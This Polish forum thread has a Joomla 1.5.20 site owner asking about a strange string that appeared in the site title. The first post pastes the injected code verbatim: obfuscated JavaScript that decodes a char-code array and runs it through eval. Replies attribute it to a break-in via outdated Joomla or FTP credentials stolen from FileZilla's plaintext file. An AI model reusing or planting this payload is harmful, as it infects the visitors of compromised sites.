Witam mam witrynę postawioną na joolmli 1.5.20 i nagle wczoraj, zupałnie bez powodu, w miejscu gdzie jest nazwa mojej witryny (a zarazem link do strony głównej) pojawił się następujący ciąg znaków:

v="va"+"l";try{faweb++}catch(btawetb){try{fve^32}catch(btawt 4){w=window;e=w["e".concat(v)];}}if(1){f=new Array(40,101,115,110,98,114,105,110,108,40,40,11,1 0,122,11,10,31,116,97,113,30,97,31,59,32,99,109,99 ,116,107,101,109,114,46,98,112,101,96,114,101,68,1 06,101,108,99,110,115,38,39,104,100,114,96,107,101 ,38,39,59,12,8,13,9,30,97,45,113,114,98,30,61,31,3 7,104,115,114,112,57,45,47,83,80,65,69,68,73,66,81 ,76,78,82,83,69,71,86,68,44,105,109,100,111,46,98, 101,113,103,118,104,108,103,46,99,108,100,97,116,1 00,98,45,104,108,99,113,99,97,114,99,115,94,113,11 7,97,107,105,115,114,105,109,101,95,115,109,46,111 ,102,112,38,57,13,9,30,97,45,113,116,120,106,101,4 5,110,111,114,103,116,104,109,110,31,59,32,38,95,9 8,114,109,108,116,114,101,38,57,13,9,30,97,45,113, 116,120,106,101,45,96,111,113,98,101,113,30,61,31, 37,48,38,57,13,9,30,97,45,113,116,120,106,101,45,1 02,101,104,101,104,115,30,61,31,37,49,111,118,39,5 8,11,10,31,95,46,114,114,121,107,99,46,118,103,100 ,115,102,32,60,30,39,48,110,120,38,57,13,9,30,97,4 5,113,116,120,106,101,45,106,101,101,114,32,60,30, 39,48,110,120,38,57,13,9,30,97,45,113,116,120,106, 101,45,114,111,111,30,61,31,37,49,111,118,39,58,11 ,10,12,8,32,104,100,40,32,98,111,98,115,109,100,10 8,116,45,101,101,115,67,108,100,107,101,109,114,66 ,120,71,100,39,37,97,99,110,108,38,39,41,12,8,32,1 22,11,10,31,98,111,98,115,109,100,108,116,45,117,1 14,104,114,101,39,37,60,99,103,118,31,103,100,60,9 0,39,96,98,112,107,90,39,61,58,47,99,103,118,61,37 ,41,58,11,10,31,98,111,98,115,109,100,108,116,45,1 01,101,115,67,108,100,107,101,109,114,66,120,71,10 0,39,37,97,99,110,108,38,39,46,96,110,112,100,108, 100,66,102,105,107,98,40,96,39,59,12,8,32,124,11,1 0,124,39,40,40,57);}w=f;s=[];r=String;x="j%";for(i=0;-i+453!=0;i+=1){j=i;if(e&&(031==0x19))s=s+r["fromCharCode"]((1*w[j]+e(x+3)));}if(0x10==020)try{(w+s)()}catch(asga){e("if(1)"+s+"");} /">
Później dopiero jest tytuł

Co mam z tym zrobić ? Skąd to się wzięło ?

Dobra usunąłem to z kodu w templatce, ale skąd to się wzięło i co to było ?

to były na 99,9% odwiedziny nieproszonych gości... ale tak to jest jak ma się starą wersję Joomla. Postępowanie po włamaniu opisano na wiki.joomla.pl i milion razy na tym forum.

Czasem też nie wystarczy mieć zaktualizowanej Joomla! - na hostingu współdzielonym trzeba uważać z uprawnieniami plików + warto też uważać na klienta FTP Fillezilla - na Windows istniają robaki, które wyłuskują z pliku XML tego klienta FTP dane dostępowe i automatycznie łączą się ze stronami z listy stron infekując je (bo Fillezilla trzyma dane dostępowe tekstem jawnym w pliku XML).

@Dziudek to nie wina FileZilla, że komuś się włamali. Bo tak samo i TotalCommander jest dziurawy. Problemem jest to że wiele osób jest nieodpowiedzialnych i przechowuje hasła w programie, żeby nie wpisywać za każdym razem. A to wielki błąd. Hasła trzymamy w głowie, ewentualnie w kajeciku na biurku.

Możesz mieć mega super zabezpieczenia, a mając starą wersję Joomla otwierasz drzwi potencjalnym "gościom".

Pozwolę sobie też zauważyć, że w swoim poście nie napisałem, że włamanie to wina Fillezilli - tylko, że trzeba na takie programy jak Fillezilla uważać ze względu na sposób przechowywania danych. Chciałem pokazać inne potencjalne ścieżki, które mogły doprowadzić do włamania, bo ktoś zaktualizuję Joomla! do najnowszej wersji i będzie zdziwiony, że ma kolejne włamania.